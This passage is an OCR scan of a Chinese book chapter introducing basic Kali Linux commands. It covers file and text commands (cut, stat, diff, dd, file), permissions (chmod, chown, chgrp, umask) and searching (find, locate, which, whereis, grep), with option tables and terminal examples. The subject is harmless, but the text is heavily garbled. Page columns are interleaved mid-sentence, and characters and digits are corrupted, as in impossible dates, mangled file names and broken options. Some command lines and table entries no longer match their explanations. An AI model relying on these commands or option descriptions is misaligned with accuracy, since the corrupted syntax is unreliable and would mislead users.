-0 取消 分 割 多 字 节 字符 


税 提 示 :， cut 命令 从 文件 的 每 一 行 剪 切 字 
节 、 字 符 和 字段 并 将 这 些 字 节 、 字 符 和 字 
段 写 至 标准 输出 。 如 果 不 指定 文件 参数 ， 
cut 命 令 将 读 取 标准 输入 ， 不 过 ， 必 须 指 
定 -b、-c 或 -f 标 志 之 一 。 


例如 : 使 用 cut 截 取 部 分 内 容 进 行 显 
示 ， 下 图 为 命令 执行 效果 。 
root@kali:~/temp# cat 001.txt 


60901:xiaoming:75:30:55:60 
902:zhangsan:80:90:100:88 


root@kali:~/temp# cut -d":" -f2 001.txt 


xiaoming 
zhangsan 


例如 : 使 用 cat 读 取 文 件 再 使 用 cut 进 行 
截取 某 段 内 容 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat 001.tXxt 
001:xiaoming:75:30:55:60 
602:zhangsan:80:90:100:88 
root@kali:~/temp# cat 0991.txt | cut -d":" 
175:30 

80:90 


-f3,4 


4.4.4 stat 


Kali Linux 系 统 中 的 stat 命 令 可 以 用 于 查看 
文件 的 存储 信息 和 时 间 等 信息 ， 会 显示 出 文 
件 的 三 种 时 间 状 态 : 最 近 访 问 (Access) 、 
更 改 (Modify) 、 改 动 (Change) 。 命 令 
语法 格式 如 下 : 

stat [文件 或 目录 ] 


例如 : 使 用 stat 可 以 查看 文件 详细 时 
间 ， 下 图 为 命令 执行 效果 。 


Iroot@kali:~/temp# stat 661.txt 
文件 : 661 .txt 
大 小 : 12 块 :8 


: I0 块 ; 4996 普通 文件 
Inode : 3548922 不 链接 : 1 
Uid : 


设备 ; 891hy2649d 
| 唱 3 a/ root) Gid: ( 6/ root) 


帜 限 :; (6644/-rw-r--r--) : 
最 近 访 问 : 26168-11-01 64:47:42.6984539107 -6400 
忌 近 更 改 : 2916-11-91 64:47:37.846539246 -8499 
最 近 改 动 ; 2818-11-01 8@4:47:37.848539246 -8460 
创建 时 间 : - 
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4.4.5 diff 


Kali Linux 系 统 中 的 di 命令 用 于 比较 文件 的 差异 ，di 全 以 逐 行 的 方式 ， 比 较 文本 文件 的 AR 
异同 处 ， 如 果 指 定 要 比较 目录 ， 则 diff 会 比较 目录 中 相同 文件 名 的 文件 ， 但 不 会 比较 其 中 
的 子 目录 。 命 令 语法 格式 如 下 : 


diff [选项 ] 文件 


命令 中 选项 的 参数 介绍 见 下 表 。 


选 项 
-< 行 数 > 
-a 或 --text di 位 
-b 或 --ignore-space-change 
-B 或 --ienore-blank-lines 
-C 
-C< 行 数 > 或 --context< 行 数 > 


-dd 或 --minimal 


-D< 巨 集 名 称 > 或 ifdef< 巨 集 名 称 > 


-e 或 --ed 
-f 或 -forward-ed 


-H 或 --speed-large-files 


-]< 字 符 或 字符 串 > 或 --ignore-matching- 


lines< 字 符 或 字符 串 > 
-1 或 --ignore-case 

-] 或 --paginate 
-0 或 --Tcs 

-N 或 --new-file 

Only in 目 录 


-Pp : 
-P 或 --unidirectional-new-file 


-qd 或 --brief 

-I 或 --Tecursive 

-S 或 --Teport-identical-files 

-S< 文 件 > 或 --starting-file< 文 件 > 


-t 或 --expand-tabs 


表 ”diff 命令 参数 介绍 


含 义 
指定 要 显示 多 少 行 的 文本 。 此 参数 必须 与 -c 或 -u 参 数 一 并 使 用 
预 设 只 会 逐 行 比较 文本 文件 
不 检查 空格 字符 的 不 同 
不 检查 空白 行 


显示 全 部 内 文 ， 并 标 出 不 同 之 处 

与 执行 “-c-< 行 数 >” 指 令 相 同 

使 用 不 同 的 演算 法 ， 以 较 小 的 单位 来 做 比较 

此 参数 的 输出 格式 可 用 于 前 置 处 理 器 巨 集 

此 参数 的 输出 格式 可 用 于 ed 的 script 文 件 

输出 的 格式 类 似 ed 的 script 文 件 ， 但 按照 原来 文件 的 顺序 来 显示 不 同 处 
比较 大 文件 时 ， 可 加 快速 度 


若 两 个 文件 在 某 几 行 有 所 不 同 ， 而 这 几 行 同时 都 包含 了 选项 中 指定 的 
字符 或 字符 串 ， 则 不 显示 这 两 个 文件 的 差异 


不 检查 大 小 写 的 不 同 

将 结果 交 由 pr 程序 来 分 页 

将 比较 结果 以 RCS 的 格式 来 显示 

在 比较 目录 时 ， 寿 文件 A 仅 出 现在 茶 个 目录 中 ， 预 设 会 显示 
文件 A 知 使 用 -N 参 数 ， 则 diff 会 将 文件 A 与 一 个 空白 的 文件 比较 

各 比较 的 文件 为 C 语 言 的 程序 码 文件 时 ， 显 示 差 异 所 在 的 函数 名 称 


与 -N 类 似 ， 但 只 有 当 第 二 个 目录 包含 了 一 个 第 一 个 目录 所 没有 的 文件 
时 ， 才 会 将 这 个 文件 与 空白 的 文件 做 比较 


仅 显 示 有 无 差异 ， 不 显示 详细 的 信息 
比较 子 目录 中 的 文件 

铬 没有 发 现任 何 差 异 ， 仍 然 显 示 信 息 
在 比较 目录 时 ， 从 指定 的 文件 开始 比较 
在 输出 时 ， 将 tab 字 符 展开 


选 项 
-TI 或 --initial-tab 
-U.-U< 列 数 > 或 --unified=< 列 数 > 
-V 或 --version 
-wW 或 --ignore-all-space 
-W< 宽 度 > 或 -width< 宽 度 > 
-x< 文 件 名 或 目录 > 或 --exclude< 文 件 名 或 
目录 > 


-又 < 文件 > 或 --exclude-from< 文 件 > 


-y 或 --side-by-side 


--help 
--left-column 


--suppress-common-lines 


例如 : 使 用 diff 只 比较 两 个 文件 是 否 存 


在 差异 ， 下 图 为 命令 执行 效果 。 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 ( 超 值 版 ) 


续 表 
含义 
在 每 行 前 面 加 上 tab 字 符 以 便 对 齐 
以 合并 的 方式 来 显示 文件 内 容 的 不 同 
显示 版 本 信息 
忽略 全 部 的 空格 字符 
在 使 用 -y 参 数 时 ， 指 定 栏 宽 
不 比较 选项 中 所 指定 的 文件 或 目录 
可 以 将 文件 或 目录 类 型 存 成 文本 文件 ， 然 后 在 =< 文 件 > 中 指定 此 文本 
文件 
以 并 列 的 方式 显示 文件 的 异同 之 处 
显示 帮助 


在 使 用 -y 参 数 时 ， 帮 两 个 文件 茶 一 行内 容 相 同 ， 则 仅 在 左 侧 的 栏 位 显示 
该 行内 容 


在 使 用 -y 参 数 时 ， 仅 显示 不 同 之 处 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 dd 命令 参数 介绍 


root@kali:~/temp# cat a.txt 


hello Linux 选 项 含 义 
6123456789 
root@kali:~/temp# cat b .txXt if=file 从 file 中 读 而 不 是 标准 输入 
hello linux 
at 写 到 file 里 去 而 不 是 标准 输出 。 除 非 指 定 
root@kali:~/temp# diff --brief a.txt b .txt 
文件 a.txt 和 b.txt 不 同 of=file conv=notrunc， 否 则 dd 将 把 file 截 为 0 字 节 
例如 : 使 用 diff 比 较 两 个 文件 并 打印 出 olan hd dedi lA 
不 同 部 分 ， 下 图 为 命令 执行 效果 。 i 一 次 读 和 写 bytes 字 节 。 这 将 覆盖 ibs 和 obs 
root@kali:~/temp# diff -c a.txt b.txt 
EEC ET 
四 例如 : 使 用 dd 命令 从 /dev/zero 设 备 文件 
ei 中 取出 一 个 大 小 为 560MB 的 数据 块 ， 然 后 保 
a A 和 存 成 名 为 560_file 的 文件 ， 下 图 为 执行 效果 。 


a 转换 并 输出 数据 ，dd 可 从 标准 输入 或 文件 


em 


起 中 读 取 数 据 ， 根 据 指定 的 格式 来 转换 数 
” 据 ， 再 输出 到 文件 、 设 备 或 标准 输出 。 命 


令 语法 格式 如 下 : 
dd [选项] 


root@kali:~/Ttemp# dd if=/devrzero 0f=560 tile count=1 bs=560M 
记录 了 1+6 的 恋 入 
记录 了 1+6 的 写 出 
58720256 bytes (587 MB, 560 MiB) copied, 8.11638 s, 72.3 MB/S 


4.4.7 file 


在 Kali Linux 系 统 中 ， 由 于 文本 、 目 
录 、 设 备 等 所 有 这 些 一 切 都 统称 为 文件 ， 
单 凭 后缀 无 法 确定 具体 的 文件 类 型 ， 这 时 
便 可 以 使 用 file 命 令 来 得 看 文件 类 型 。 命 令 
语法 格式 如 下 : 
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file [文件 名 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 file 命 令 参数 介绍 


选项 含 义 

-b 列 出 辨识 结果 时 ， 不 显示 文件 名 称 

-C 详细 显示 指令 执行 过 程 ， 便 于 排 错 或 分 析 程 序 执行 的 情形 

.fk 名 称 文件 > 下 其 内 容 有 一 个 或 多 个 文件 名 称 时 ， 让 file 依 序 辨识 这 些 文件 ， 格 式 为 每 列 

个 文件 名 称 

下 直接 显示 符号 连接 所 指向 的 文件 的 类 别 

-m< 文 件 1: 文件 2> 可 以 是 单个 文件 ， 也 可 以 是 用 冒号 分 开 的 多 个 文件 

-V 显示 版 本 信息 

， 尝试 去 解读 压缩 文件 的 内 容 

[文件 或 目录 .…] 要 确定 类 型 的 文件 列表 ， 多 个 文件 之 间 使 用 空格 分 开 ， 可 以 使 用 shell 通 配 符 匹 配 多 个 文件 
例如 : 使 用 file 命 令 查 看 文件 类 型 ， 下 加 安全 ， 也 可 以 避免 很 多 误 操 作 。 

图 为 命令 执行 效果 。 


4.5.1 chmod 


root@kali:~/Test/2# ls tt 

addr arping1.sh arping2.sh scan.sh scapyl.py scapy2.py et 号 性 

ht ete ASCII text executable Kall Linux/Unix 的 文件 调用 权限 分 为 三 
t@kali:~/Test/2# file /et 、 

ee eee 四 级 : 文件 拥有 者 、 群 组 、 其 他 。 利用 chmod 


命令 可 以 修改 文件 的 权限 。 命 令 语法 格式 
4.5 权限 分 配 操作 命令 如 下 : 


chmod [{ugoa}{+-=}{rwx}] [文件 或 目录 ] 
Kali Linux 系 统 对 于 权限 的 分 配 是 非常 [mode=421 ] [文件 或 目录 ] 


严格 的 ， 通 过 不 同 权限 分 配 来 达到 系统 分 命令 中 选项 的 参数 介绍 见 下 表 。 
级 管理 ， 这 样 做 的 目的 不 但 是 为 了 系统 更 


表 chmod 命 令 参 数 介绍 


选项 含义 
u 表示 该 文件 的 拥有 者 
g 表示 与 该 文件 的 拥有 者 属于 同一 个 群体 (group) 者 
o 表示 其 他 以 外 的 人 
a 表示 这 三 者 缘 是 
+ 表示 增加 权限 
- 表示 取消 权限 
= 表示 唯一 设 定 权 限 
r 表示 可 读 取 
w 表示 可 写 入 
x 表示 可 执行 
表示 只 有 当 该 文件 是 个 子 目录 或 者 该 文件 已 经 被 设 定 过 为 可 执行 
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续 表 
选 项 含 & 义 
- 若 该 文件 权限 确实 已 经 更 改 ， 才 显示 其 更 改动 作 
E 若 该 文件 权限 无 法 被 更 改 也 不 要 显示 错误 信息 
-V 显示 权限 变更 的 详细 资料 
-R 对 目前 目录 下 的 所 有 文件 与 子 目录 进行 相同 的 权限 变更 (以 递 回 的 方式 逐个 变更 ) 
--help 显示 辅助 说 明 
--VeIS10D 显示 版 本 
下 图 为 Kali Linux 中 权限 之 间 的 关系 。 4.5.2 chown 
| E | 到 Kali Linux/Unix 是 多 人 多 工 操作 系统 ， 
|412|1|4121]1+|+41]2:1| "| 每 个 文件 都 有 所 有 者 chown 将 指定 文件 的 


权限 分 本 “| 文件 所 有 者 | 。 文件 所 属 组 |。 其 他 用 户 
尽管 在 Kali Linux 系 统 中 一 切 都 是 文 

件 ， 但 是 每 个 文件 的 类 型 不 尽 相 同 ， 因 此 

Kali Linux 系 统 使 用 了 不 同 的 字符 来 加 以 区 

分 ， 常 见 的 字符 见 下 表 。 

表 常见 的 字符 


所 有 者 为 指定 的 用 户 或 组 ， 用 户 可 以 是 用 
户 名 或 者 用 户 ID， 可 以 是 组 名 或 者 组 ID。 
文件 是 以 空格 分 开 的 要 改变 权限 的 文件 列 
表 ， 文 持 通配符 。 

一 般 来 说 ， 这 个 指令 只 有 是 由 系统 管 
理 者 (root) 所 使 用 ， 一般 使 用 者 没有 权限 


字符 说 明 可 以 改变 别人 的 文件 拥有 者 ， 也 没有 权限 
EE 区 = 可 以 自己 的 文件 拥有 者 改 设 为 别人 。 只 有 
和 系统 管理 者 〈root) 才 有 这 样 的 权限 。 命 令 
语法 格式 如 下 : 
1 链接 文件 
块 设 各 文件 chown [用 户 ] [文件 或 目录 ] 
re 命令 中 选项 的 参数 介绍 见 下 表 。 
窒 道 文件 表 trs 命 令 参数 介绍 
P 
选 项 含 义 
例如 : 使 用 chmod 售 令 修改 文件 权限 ， User 新 的 文件 拥有 者 的 使 用 者 ID 
使 文件 具有 可 执行 权限 ， 下 图 为 执行 效果 。 group 新 的 文件 拥有 者 的 使 用 者 组 (group) 
ee temp# ls -la | . 显示 更 改 的 部 分 的 信息 
drwxr-xr-x 2 root root 4696 16 月 30 23:37 ， 
i 名 略 错误 信息 
Iroot@kali:~/temp# chmod 755 001.txt 
站 temp# LS -la -h 修复 符号 链接 
dr 显示 详细 的 处 理 信息 
-rwxr-xr-x 1 root root 0 10 月 30 22:48 001 .tx1 处 理 指定 目录 以 及 其 子 目录 下 的 所 有 
例如 : 使 用 chmod 命 令 修 改 文件 权限 ， R 


取消 可 执行 权限 ， 下 图 为 执行 效果 。 


root@kali:~/temp# Chmod u-x 091.txt 
root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-x 2 root root 4096 196 月 36 23:37  . 
drwxr-xr-x 30 root root 4096 16 月 36 22:48 ..， 
-rw-r-Xxr-X 1 root root 9 _ 16 月 39 22:48 001 .tx 
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fr 


chown 命 令 的 作用 是 修改 文件 的 所 有 
者 ， 例 如 : 修改 文件 test 001.txt 所 有 者 ， 使 
用 “chown test 001.txt” 命 令 ， 执 行 效果 如 
下 图 所 示 。 


root@kali:~/temp# ls -la 

总 用 量 8 

drwxr-xr-Xx 2 root root 46096 16 月 39 23:37 ， 

drwxr-xr-x 30 root root 4096 16 月 30 22:48 .. 
-rw-r-xr-x 1 root root 9 18 月 38 22:48 661 .tx 

root@kali:~/temp# chown test 601.txt 

root@kali:~/temp# ls -la 

总 用 量 

drwxr-xr-x 2 root root 46096 16 月 39 23:37 ， 

drwxr-xr-x 30 root root 4096 16 月 36 22:48 . 
-Frw-r-Xr-X 1 test root 0 16 月 39 22:48 901. txX 世 


4.5.3 chgrp 


Kali Linux 系 统 中 的 chgrp 命 令 用 于 变更 
文件 或 目录 的 所 属 群 组 。 在 UNIX 系 统 家 族 
里 ， 文 件 或 目录 权限 的 掌控 以 所 有 者 及 所 属 
群 组 来 管理 ， 用 户 可 以 使 用 chgrp 指 令 去 变 
更 文件 与 目录 的 所 属 群 组 ， 设 置 方式 采用 群 
组 名 称 或 群 组 ID。 命 令 语法 格式 如 下 : 


[用 户 组 ] [文件 或 目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参数 介绍 


chgrp 


选 项 含义 
效果 类 似 “-v” 选 项 ， 但 仅 回 
报 更 改 的 部 分 
-f 或 --quiet 或 --silent ”| 不 显示 错误 信息 
-h 或 -no-dereference 只 对 符号 连接 的 文件 做 修改 ， 
而 不 更 动 其 他 任何 相关 文件 


递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目录 一 并 处 理 


-R 或 --recursive 


-V 或 --verbose 显示 指令 执行 过 程 
--help 在 线 帮 助 
把 指定 文件 或 目录 的 所 属 群 组 
有 二 < 参 
< 参 孝文 | 全 部 设 成 和 参考 文件 或 目录 的 
所 属 群 组 相同 
--version 显示 版 本 信息 


chgrp 命 令 同 修改 文件 所 有 者 类 似 ， 

一 个 用 于 修改 用 户 ， 一 个 则 用 于 修改 所 属 
组 ， 例 如 : 使 用 chgrp 修 改 文件 所 属 组 ， 下 
图 为 执行 效果 。 

root@kali:~/temp# ls -la 

总 用 量 8 
drwxr-xr-x 2 root root 49096 16 月 30 23:37 ， 
drwxr-xr-x 30 root root 4096 16 月 30 22:48 .. 
-rw-r-xr-X 1 test root 9 16 月 30 22:48 9601.fXxt 
root@kali:~/temp# chgrp test 001.txt 
root@kali:~/temp# ls -la 
总 用 量 8 
drwxr-xr-x 2 root root 4096 196 月 30 23:37 . 


drwxr-xr-x 30 root root 46096 16 月 30 22:48 .， 
-rw-r-Xr-X 1 test test 0 16 月 30 22:48 0801.7XL 


悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


4.5.4 umask 


Kali Linux 系 统 中 的 umask 命 令 指定 在 隔 二 抽 
建立 文件 时 预 设 的 权限 掩 码 。umask 可 用 
来 设 定 权 限 掩 码 。 权 限 掩 码 是 由 3 个 八进制 
Re tle ite 


限 。 和 外 请 守 格式 如 下 

umask [-S] 

命令 中 选项 参数 -S$， 表 示 以 rwx 形 式 显 
示 新 建文 件 默认 权限 

例如 : 执行 umask 命 令 可 以 查看 默认 权 
限 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# Umask 
0022 

root@kali:~/temp# Umask -S 
U=rwX,g=rXx,o=rx 


全 注意 : 默认 权限 的 计算 方式 为 drwxr- 
xr-Xx=/7/-022=155。 


4.6 ”文本 搜索 操作 命令 


随 看 操作 系统 的 使 用 时 间 加 长 ， 系 统 
中 会 存放 大 量 的 文件 信息 ， 如 何 快速 定位 
到 茶 个 文件 这 就 需要 使 用 文件 搜索 指令 。 


4.6.1 find 


Kali Linux 系 统 中 的 fnd 命 令 用 来 在 指定 辟 肥 综 
目录 下 查找 文件 ， 任 何 位 于 参数 之 前 的 字 
符 串 都 将 被 视 为 欲 查 找 的 目录 名 。 如 果 使 
用 该 命令 时 ， 不 设置 任何 选项 ， 则 find 命 令 
将 在 当前 目录 下 得 找 子 目录 与 文件 ， 并 且 将 
查找 到 的 子 目 录 和 文件 全 部 进行 显示 。 命 令 
语法 格式 如 下 : 


find path 
[ -exec 三 全 长 


= 一 OP 二 On [ rink | 


{Ns 


find 命 令 根据 下 列 规则 判断 path 和 expres- 
sion， 在 命令 列 上 第 一 个 “-( ),!” 之 前 的 部 
分 为 path， 之 后 的 是 expression。 如 果 path 是 
空 字符 串 则 使 用 目前 路 径 ， 如 果 expression 
是 空 字 符 串 则 使 用 -print 为 预 设 expression。 


command | 
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表达 式 中 可 使 用 的 选项 有 二 三 十 个 之 多 ， 在 此 只 介绍 最 常用 的 部 分 ， 见 下 表 。 
表 表达 式 中 可 使 用 的 选项 


选 项 含 义 
-mount, -Xdev 只 检查 和 指定 目录 在 同一 个 文件 系统 下 的 文件 ， 避 免 列 出 其 他 文件 系统 中 的 文件 
-amin n 在 过 去 n 分 钟 内 被 读 取 过 的 的 文件 
-anewer file 比 文件 file 更 晚 被 读 取 过 的 文件 
-atime n 在 过 去 n 天 内 被 读 取 过 的 文件 
-cmin n 在 过 去 n 分 钟 内 被 修改 过 的 文件 
-cnewer file 比 文件 file 更 新 的 文件 
-ctime n 在 过 去 n 天 内 被 修改 过 的 文件 
-empty 空 的 文件 
-gid n or -group name id 是 n 或 是 group 名 称 是 name 的 文件 
-ipath p. -path p 路 径 名 称 符合 p 的 文件 ，ipa 了 h 会 忽略 大 小 写 


-name name. -iname name 文件 名 称 符合 name 的 文件 。iname 会 忽略 大 小 写 
文件 大 小 是 n 单 位 ，b 代 表 512 位 元 组 的 区 块 ，c 表 示 字 元 数 ，k 表 示 Kilo bytes，w 是 二 


-Slze Nn 


个 位 元 组 
搜索 指定 类 型 的 文件 ， 其 中 d 代 表 目 录 文 件 ; c 代 表 字 符 设备 文件 ; b 代 表 快 设备 文 
-type c 件 ; p 代 表 管道 文件 ，f 代 表 普 通 文件 ，1 代 表 符 号 链接 文件 ，s 代 表 socket 文 件 用 于 网 
络 通信 和 链接 的 文件 
-pidn 进程 id 是 z 的 文件 
下 面 举例 说 明 find 命 令 的 使 用 方法 | [ET 


_ ee drwxr-xr-x 2 root root 4096 106 月 30 23:37 . 
例如 使 用 find /etc name Inlt 命 drwxr-xr-x 30 root root 4096 10 月 30 22:48 ..， 


人 和 = 尽 ] ~ -TW- rT-Xxr- 1 test test 9 10 月 30 22:48 001 .txt 
人 在 目录 /etc 中 碍 找 文 件 init， 下 图 为 命 dn find /root/temp -user test 


令 执 行 效果 ， 使 用 -iname 不 区 分 大 小 写 。 /root/temp/901.txt 
root@kali:~/temp# find 和 例如 : 使 用 find / -cmin -5 命令 ， 在 根 


/etc/apparmor/init 目录 下 但 找 5 分 钟 内 被 修改 过 属性 的 文件 和 


/etc/init 
| 目 ， 友 ] > 仿 杆 入 
例如 : 使 用 find / -size +204800 命 令 ， 肥 下 图 为 命令 执行 效果 | | 
root@kali:~/temp# find / -cmin -5 


在 根 目 录 下 查找 大 于 100MB 的 文件 ， 下 图 /proc/1977/task/1088/fd/34 
为 命令 执行 效果 ， 其 中 +n 大 于 、-n 小 于 、n /proc/1717/task/1717/fd/6 


/proc/1717/task/1717/fdinfo/6 


等 于 。 /proc/1718 
/proc/1718/task 
root@kali:~/temp# find / -size +204860 /proc/1718/task/1718 
/proc/kcore 
find: “/proc/1715/task/1715/fd/6': 没有 那个 文件 或 目录 /proc/1718/task/1718/fd 
find: “/proc/1715/task/1715/fdinfo/6’: 没有 那个 文件 或 目录 
find: “/proc/1715/fd/5': 没有 那个 文件 或 目录 , - - 
find: “/proc/1715/fdinfo/5': 没有 那个 文件 或 目录 例如 : 使 用 find /etc -size +1024 -a -size 
/sys/devices/pci0000:00/0000:00:0f.0/resourcel 
/sys/devices/pci00800:00/0000:00:0f.0/resourcel wc -204800 命 令 ， 在 /etc 下 查找 大 于 0.5MB 小 于 


例如 : 使 用 find /root/temp -user test 100MB 的 文件 ， 下 图 为 命令 执行 效果 。-a 两 
命令 ， 在 /root/temp 目 录 下 查找 所 有 者 为 test 个 条 件 同 时 满足 ; -o 两 个 条 件 满足 任意 一 个 
的 文件 ， 下 图 为 命令 执行 效果 ，-group 根 据 印 可 。 

所 属 组 查找 。 
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root@kali:~/temp# find /etc -Size +1024 -a -size 
/etc/ssh/moduli 
/etc/netsniff-ng/oui.conf 


拉 尖 


例如 : 使 用 find /etc -name inittab -exec 
ls -] {} \; 命令 ， 在 /etc 下 查找 pam.d 目 录 中 
的 文件 并 显示 其 详细 信息 ， 下 图 为 命令 执 
行 效果 。 


root@kali:~/temp# Tind /etc -name pam.d -exec ls -[ TAN\; 
总 用 量 14 


-rw-r--r-- 
-rw-r--r-- 
-rw-r--r-- 
-rw-r--r-- 
-rw-r--r-- 


1 raoot root 384 3 月 27 26017 chfn 

1 root root 92 9 月 27 2617 chpasswd 

1 root root 581 3 月 27 2617 chsh 

1 root root 1208 1l6 月 8 91:92 common-account 
1 root root 1221 16 月 8 01:02 common-auth 

1 root root 1486 16 月 8 01:602 common-password 
1 root root 1189 1l6 月 8 91:92 common-session 
1 root root 1154 16 月 8 01:02 common-session-noninteractive 


-rw-r--r-- 
-rw-r--r-- 
-rw-r--r-- 


4.6.2 locate 


Kali Linux 系 统 中 的 locate 命 令 用 于 查找 
符合 条 件 的 文档 ， 它 会 去 保存 文档 和 目录 
名 称 的 数据 库 内 ， 查 找 符 合 范 本 样式 条 件 
的 文档 或 目录 ， 一 般 情 况 输入 locate your_ 
file name 即 可 查找 指定 文件 。 命 令 语 法 格 
式 如 下 : 


locate [-d ][--help] [--version] [范本 
A 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 locate 命 令 参 数 介 绍 


选 项 含 义 

配置 locate 指 令 使 用 的 数据 库 ， 默 
认 locate 指 令 预 设 的 数据 库 位 于 /var/ 

-d 或 --database= | lib/slocate 目 录 里 ， 文 档 名 为 slocate. 
db， 当 然 也 可 以 使 用 这 个 选项 男 行 
指定 

--help 在 线 帮助 

--Version 显示 版 本 信息 


站 提示 : locate 与 find 不 同 ，find 是 在 硬盘 中 
寻找 ，locate 只 在 /Var/lib/slocate 资 料 库 中 了 寻 
找 。l]locate 的 速度 比 find 快 ， 它 并 不 是 真 的 
查找 ， 而 是 查 数据 库 ， 一 般 文件 数据 库 在 
/var/lib/slocate/slocate.db 中 ， 所 以 locate 的 查 
找 并 不 是 实时 的 ， 而 是 以 数据 库 的 更 新 为 
准 ， 一 般 是 系统 自己 维护 ， 也 可 以 人 工 升 
级 数据 库 ， 命 令 为 locate -u。 
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例如 : 使 用 locate inittab 命 令 ， 查 找 init- 
tab 字 段 的 文件 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# locate inittab 
/usr/share/terminfo/a/ansi+inittabs 
/usr/share/vim/vim81/syntax/inittab.vim 


4.6.3 which 


找 文件 ，which 指 令 会 在 环境 变量 $SPATH 
设置 的 目录 里 查找 符合 条 件 的 文件 。 命 令 
语法 格式 如 下 : 

whiiiech [文件 = ==] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 ”trs 命 令 参数 介绍 


选 项 含义 
指定 文件 名 长 度 ， 指 定 的 长 度 必 
-n< 文 件 名 长 度 > | 须 大 于 或 等 于 所 有 文件 中 最 长 的 
文件 名 
与 -n 参 数 相同 ， 但 此 处 的 < 文件 名 
了 < 文 作 名 长 度 ” | 长 度 > 包括 了 文件 的 路 径 
二 指定 输出 时 栏 位 的 宽度 
-V 显示 版 本 信息 


例如 : 使 用 which 命 令 搜索 命令 所 在 
路 径 ， 执 行 which ls 命令 ， 下 图 为 命令 执行 
效果 。 


Pr which ls 
usr/bin/ls 


4.6.4 whereis eR 


Kali Linux 系 统 中 的 whereis 命 令 用 于 查 羡 汰 半 
找 文 件 。 该 指令 会 在 特定 目录 中 查找 符合 
条 件 的 文件 。 这 些 文件 应 属于 原始 代码 、 
二 进 制 文件 ， 或 是 帮助 文件 。 不 过 ， 该 指 
令 只 能 用 于 查找 二 进 制 文件 、 源 代码 文 
件 和 man 手 册页 ， 一 般 文 件 的 定位 需 使 用 
locate 命 令 。 命 令 语法 格式 如 下 : 


whereis [-bfmsu] [-B < 目录 >...] [-M < 目 
> ROP 


命令 中 选项 的 参数 介绍 见 下 表 。 
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表 ”whereis 命 令 参数 介绍 4.6.5 grep 

er 多 Kali Linux 系 统 中 的 grep 命 令 用 于 查 
on 找 文 件 里 符合 条 件 的 字符 串 ， 其 查找 的 内 
村 不 显示 文件 名 前 的 路 径 宇 称 容 包含 指定 的 范本 样式 文件 ， 如果 发 现 蕉 
, 只 查找 说 明文 件 文件 的 内 容 符 合 所 指定 的 范本 样式 ， 预 设 
_M< 目 录 > | 只 在 设置 的 目录 下 查找 说 明文 件 grep 指 令 会 把 含有 范本 样式 的 那 一 列 显示 出 
-s 只 查找 原始 代码 文件 来 。 寿 不 指定 任何 文件 名 称 ， 或 是 所 给 予 
-S< 目 录 > | 只 在 设置 的 目录 下 查找 原始 代码 文件 的 文件 名 为 “-”， 则 grep 指 令 会 从 标准 输 

a 合 找 不 包含 指定 类 型 的 文件 入 设备 读 取 数据 。 命 令 语法 格式 如 下 : 
例如 : 使 用 whereis 命 令 搜索 命令 及 帮 grep [-abcEFGhHilLnqrsvVwxy] [-RA< 显 示 


: 径 ， 行 whereis ls 命令 ， 列 数 >] [-B< 显 示 列 数 >] [-C< 显 示 列 数 >] [-d< 进 行动 
助 文 全 所 在 路 从 ， 妆 行 whereis 他 作 ,下 | 村 


图 为 命令 执行 效果 。 本 样式 ] [文件 或 目录 . .. ] 
root@Kkali:~/temp# whereis ls \ 

: /usr/bin/ls /usr/share/man/manl/ls.1.9g2 命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”grep 命 令 参数 介绍 
选 项 含 义 

a 或 text 不 要 忽略 二 进 制 的 数据 

人 < 显示 行 数 -或 -< 显示 | 
ee after-context=< 显 不 | 除了 显示 符合 范本 样式 的 那 一 列 之 外 ， 并 显示 该 行 之 后 的 内 容 
了 b 或 _byte_offset 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 第 一 个 字符 的 编号 
_B< 显 示 行 数 > 或 _before_context-< 品 - . 加 

B< 显 示 行 数 > 或 -before-context=< 显 | 除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 的 内 容 
示 行 数 > 

-C 或 --count 计算 符合 样式 的 列 数 


-C< 显 示 行 数 > 或 -- =< 显 示 行 __ 0 
< 时 不 eontext 个 了 和 | 除了 显示 符合 样式 的 那 一 行 之 外 ， 并 显示 该 行 之 前 后 的 内 容 
> 或 -< 显示 行 数 > 


> q 轩 三 | ~ yA » 参 ， 
-d < 动作 > 或 _directories 一 < 动作 > 当 指 定 要 查找 的 是 目录 而 非 文 件 时 ， 必 须 使 用 这 项 参数 ， 否 则 grep 指 令 将 


回报 信息 并 停止 动作 
-e< 范 本 样式 > 或 --Tegexp=< 范 本 样式 > | 指定 字符 串 作 为 查找 文件 内 容 的 样式 
-E 或 --extended-regexp 将 样式 为 延伸 的 普通 表示 法 来 使 用 


指定 规则 文件 ， 其 内 容 含 有 一 个 或 多 个 规则 样式 ， 让 grep 坦 找 符合 规则 条 


a 口 Er 由 
你 规则 文件 > 或 -人 ie=< 规 则 文件 > | 件 的 文件 内 容 ， 格 式 为 每 行 一 个 规则 样式 


-下 或 --fixed-regexp 将 样式 视 为 固定 字符 串 的 列表 

-G 或 --basic-regexp 将 样式 视 为 普通 的 表示 法 来 使 用 

-h 或 --no-filename 在 显示 符合 样式 的 那 一 行 之 前 ， 不 标示 该 行 所 属 的 文件 名 称 
-HH 或 --with-filename 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 该 行 所 属 的 文件 名 称 

-i 或 --ignore-case 忽略 字符 大 小 写 的 差别 

-1 或 --file-with-matches 列 出 文件 内 容 符 合 指定 的 样式 的 文件 名 称 

-或 --files-without-match 列 出 文件 内 容 不 符合 指定 的 样式 的 文件 名 称 

-0 或 --line-number 在 显示 符合 样式 的 那 一 行 之 前 ， 标 示 出 该 行 的 列 数 编号 

-q 或 --quiet 或 --silent 不 显示 任何 信息 
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草 
续 表 
选 项 含 & 义 
工 或 --recursive 此 参数 的 效果 和 指定 “-d recurse” 参 数 相同 
-S 或 --no-messages 不 显示 错误 信息 
